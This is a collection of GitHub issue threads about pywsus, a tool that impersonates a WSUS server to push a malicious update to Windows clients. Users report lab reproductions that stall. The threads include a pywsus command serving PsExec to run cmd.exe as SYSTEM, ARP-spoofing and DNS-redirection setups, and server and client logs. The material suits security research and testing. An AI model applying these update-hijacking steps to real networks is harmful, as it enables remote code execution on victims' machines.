Windows update stucks at 0% at installation step causing others update waiting for their download…

I went through the other open and resolved issues and it seems like some other people had a similar issue but slightly different behaviour.

Target windows 10 system does not have internet access, also has crowdstrike falcon running (not getting any alerts that behaviour is being blocked, but I may not see them since its running as SYSTEM instead of my user)

Instead of ARP spoofing I am adding a static DNS entry to the DNS server to point at my linux machine running pywsus

It works successfully for the most part and I get Sync Updates and GetExtendedUpdateInfo as seen below

`
$ python3 pywsus.py -H 192.168.2.38 -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "whoami >> C:\\poc.txt "'        
INFO:root:The update metadata - uuids: [UUID('ba4be06f-7b7d-4a0e-a27a-29b333009561'), UUID('4a6379ce-7c31-4add-a7d0-96a2638c0da1')],revision_ids: [915630, 941906], deployment_ids: [98449, 93574], executable: PsExec64.exe, sha1: /XmA0+Q38oAA+oFVdKMm5WnrVI4=, sha256: WRC0nAQbgPbo0ujhB1KpBi/r5KLt0V8HxrGWGzx5wSk=
INFO:root:Starting httpd...

192.168.2.129 - - [24/Nov/2022 12:01:05] "POST /ClientWebService/client.asmx HTTP/1.1" 200 -
INFO:root:SOAP Action: "http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/SyncUpdates"
192.168.2.129 - - [24/Nov/2022 12:01:10] "POST /ClientWebService/client.asmx HTTP/1.1" 200 -
INFO:root:SOAP Action: "http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetExtendedUpdateInfo"
`

I am not getting any GET request for PsExec64.exe, I have tried using other windows signed binaries and exact same behaviour as above

On the windows 10 side, when I click "Check for Updates", the above requests pop up on the WSUS server and a new update will pop up in Windows but will not complete, it gets stuck with the status:
Status: Downloading - 0%

I have tried all the basic troubleshooting steps and no luck, ive tried rebooting multiple times, letting it check for updates from the legitimate server, then grab updates from the malicious server and same behaviour. I have also made sure the endpoint protection and AWS is not blocking PsExec64.exe, i am able to run PsExec64 no problem on the system as a non-admin.

My theories for why im having this issue:

• No internet access when connected to malicious WSUS server (long story but real WSUS server is reached through always-on VPN, if i connect to the internet I get my default route overwritten by the VPN and cant connect to my local machines)
• Endpoint protection is stopping the attack, but I cant find any info about CrowdStrike blocking these types of attacks

Im mostly wondering what may cause windows to not download the binaries, I see that was a problem in a previous issue but the resolution was unclear although in that issue, the windows update was not getting stuck at 0%

To recreate my network conditions, I have the windows machine set up with a static IP, a bogus default gateway (to stop internet connection) and set the DNS server to a local DNSMASQ server that resolves the WSUS hostname to another host on my subnet

Hello,

I am have the following test case :

1. Windows 10 build is 19041.76 in a domain.
2. For the MITM portion, I configured via gpedit the Wsus to be my pywsus server (running on Debian 10).
3. My pywsus server receives a SyncUpdate and a GetExtendedUpdateInfo is triggered.
4. The windows host does not download my PsExec at http://<WSUS_IP>:8530/8c1dee0a-8dfa-48c9-b21f-9993ec978214/PsExec64.exe

[edit : I managed to have the GetExtendedUpdateInfo, once I joined a domain as you mentioned in another issue. Do you know, what are the registry keys involved ?]

Thanks for your time,

Thanks in advice: error NU1101: Titanium.Web.Proxy package not found. There is no package with this id. in the origins: M
Microsoft Visual Studio Offline Packages
\WSuspicious.csproj :

Windows update now uses domain download.windowsupdate.com for xmls and au.download.windowsupdate.com for recieving files and IP always changes on almost every request its different, source port also changes always and destination port is always 80. Could this still be used with MITM in this case, any directions how to do it for latest windows 10. Is this WUServer compatibile with latest windows?

Does the tool still correctly respond to syncupdates requests initiated on Windows 10 machines?

I have tried to replicate the PoC and set up a lab domain (Hyper-V) with a single domain controller (server 2016), and a single domain-joined Win10. Wsus has been configured with setting 3 and enabled.

After successfully arp poisoning and having "arp -a" showing the MAC address of the kali where pywsus is running, it was possible for pywsus to receive update requests. Whenever 'check for updates' is clicked on Win10, pywsus received a SyncUpdates SOAP HTTP request. However, unlike the PoC, a GetExtendedUpdateInfo request is never received by pywsus.

The Win10 updates GUI shows an error (code 80240439) contacting the update server.

The win10 wsus update log shows the following: (selected extract for brevity):

2021/04/28 12:40:08.8297096 1224 7052 WebServices Auto proxy settings for this web service call.
2021/04/28 12:40:08.8784820 1224 7052 WebServices FAILED [80240439] Web service call
2021/04/28 12:40:08.8784833 1224 7052 WebServices Current service auth scheme=0.
2021/04/28 12:40:08.8784839 1224 7052 WebServices Current Proxy auth scheme=0.
2021/04/28 12:40:08.8785000 1224 7052 Misc Got WSUS Client/Server URL: http://WIN-LUL8KLLSCLH:8530/ClientWebService/client.asmx""
2021/04/28 12:40:08.8807925 1224 7052 WebServices Proxy Behavior set to 1 for service url http://WIN-LUL8KLLSCLH:8530/ClientWebService/client.asmx
2021/04/28 12:40:08.8807971 1224 7052 ProtocolTalker FAILED [80240439] SyncUpdates_WithRecovery failed
2021/04/28 12:40:08.8808013 1224 7052 IdleTimer WU operation (CAgentProtocolTalker::SyncUpdates_WithRecover, operation # 1303) stopped; does use network; is at background priority
2021/04/28 12:40:08.8808067 1224 7052 ProtocolTalker SyncUpdates round trips: 1
2021/04/28 12:40:08.8808077 1224 7052 ProtocolTalker FAILED [80240439] Sync of Updates
2021/04/28 12:40:08.8808160 1224 7052 ProtocolTalker FAILED [80240439] SyncServerUpdatesInternal failed
2021/04/28 12:40:08.8845612 1224 7052 Agent FAILED [80240439] Synchronize

The Windows 10 VM details are as follows:

Host Name: WIN10
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.18363 N/A Build 18363
OS Manufacturer: Microsoft Corporation
Hotfix(s): 10 Hotfix(s) Installed.
[01]: KB4601056
[02]: KB4513661
[03]: KB4516115
[04]: KB4517245
[05]: KB4521863
[06]: KB4577586
[07]: KB4580325
[08]: KB4589211
[09]: KB5001406
[10]: KB5001337

I am wondering if there is either a configuration setting that is required for this to be exploitable that I may have missed, or changes may have been made to the communication protocol wherein the SOAP response from pywsus is not considered valid, or security changes have been made that stop the rogue WSUS server from successfully proceeding to patch downloading.

Note I have tried this with both the Windows firewall and windows Defender disabled and enabled, with the same outcome.

Trying to replicate the PoC in a simple setting involving two Win10 boxes with a direct network connection (i.e., no MITM involved), the process gets stuck after the SyncUpdates phase.

Whenever 'check for updates' is performed on the client, pywsus receives a SyncUpdates SOAP HTTP request. However, unlike the PoC, a GetExtendedUpdateInfo request is never received by pywsus.

Setup

Client (Win10, 10.0.0.14 ) <----------> pywsus (Win10, 10.0.0.4, local firewall disabled)

Client

Betriebssystemname: Microsoft Windows 10 Pro
Betriebssystemversion: 10.0.19043 Nicht zutreffend Build 19043
Betriebssystemhersteller: Microsoft Corporation
Betriebssystemkonfiguration: Eigenständige Arbeitsstation
Typ des Betriebssystembuilds: Multiprocessor Free
Systemtyp: x64-based PC
Prozessor(en): 1 Prozessor(en) installiert.
[01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~3003 MHz
Domain: WORKGROUP
Hotfix(es): 11 Hotfix(e) installiert.
[01]: KB5004331
[02]: KB4577266
[03]: KB4577586
[04]: KB4580325
[05]: KB4586864
[06]: KB4589212
[07]: KB4593175
[08]: KB4598481
[09]: KB5000736
[10]: KB5004237
[11]: KB5003742

PYWSUS

Betriebssystemname: Microsoft Windows 10 Pro
Betriebssystemversion: 10.0.19042 Nicht zutreffend Build 19042
Betriebssystemhersteller: Microsoft Corporation
Betriebssystemkonfiguration: Eigenständige Arbeitsstation
Typ des Betriebssystembuilds: Multiprocessor Free
Systemtyp: x64-based PC
Prozessor(en): 1 Prozessor(en) installiert.
[01]: Intel64 Family 6 Model 142 Stepping 12 GenuineIntel ~1803 MHz
Domain: WORKGROUP
Hotfix(es): 11 Hotfix(e) installiert.
[01]: KB5004331
[02]: KB4562830
[03]: KB4577266
[04]: KB4577586
[05]: KB4580325
[06]: KB4586864
[07]: KB4589212
[08]: KB4593175
[09]: KB4598481
[10]: KB5004237
[11]: KB5003742

Windows Update Client + WSUS Configuration

Client configuration via GPO

• Internal update server + intranet server for statistics: http://10.0.0.4:8530
• no connection to MS Windows Update Servers allowed
• setting 3 enabled

pywsus is run with simplified command line: python pywsus.py -v -H 10.0.0.4 -p 8530 -e PsExec64.exe -c "/accepteula"

Results + Output of tools

Whenever 'check for updates' is performed on the client, pywsus receives a SyncUpdates SOAP HTTP request and responds. However, a GetExtendedUpdateInfo request is never received by pywsus. After some time the client initiates a ReportEventBatch action, which is subsequently answered by pywsus.

• The Win10 updates GUI shows no error, but also no available updates.
• The WindowsUpdateClient eventlog just contains an event with ID 26 (no updates found), but no errors.
• The WindowsUpdate log file (etl) is attached: WindowsUpdate.20210802.etl.txt
• The output of pywsus is as follows: pywsus_output.txt

Note: This is a placeholder. We are not actively working on this. Contributions welcome!

We have a work in progress branch about this: https://github.com/GoSecure/pywsus/tree/win7_support

Hi, i have tested pywus on kali. The windows platform is windows 7.The pysus python server responded with the following error message:

192.168.124.160 - - [10/Sep/2020 04:51:09] code 501, message Unsupported method ('HEAD')
192.168.124.160 - - [10/Sep/2020 04:51:09] "HEAD /selfupdate/wuident.cab?2009100851 HTTP/1.1" 501 -
INFO:root:Requested: /selfupdate/wuident.cab?2009100851
192.168.124.160 - - [10/Sep/2020 04:51:09] "GET /selfupdate/wuident.cab?2009100851 HTTP/1.1" 200 -

Exception happened during processing of request from ('192.168.124.160', 49164)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 293, in _handle_request_noblock
self.process_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 657, in init
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 716, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

Hi! Thanks a lot for your research. Its really great. Tried to reproduce your results in lab environment and created a domain.
It consists of two machines:

• DC: Windows Server 2016 Standard 1607 14393.0
• PC: Windows 10 Education 1909 18363.1198
  Added and configured WSUS on DC.

Started everything as in the video, but nothing seems to happen. Pywsus doesnt react after arp-spoofing and host update request. Tried to run server on both Kali and Parrot OS.

Never used to install wsus before. Dont know whats the problem. Maybe you can share your lab environment (stands) or suggest where to look for?

traffic.txt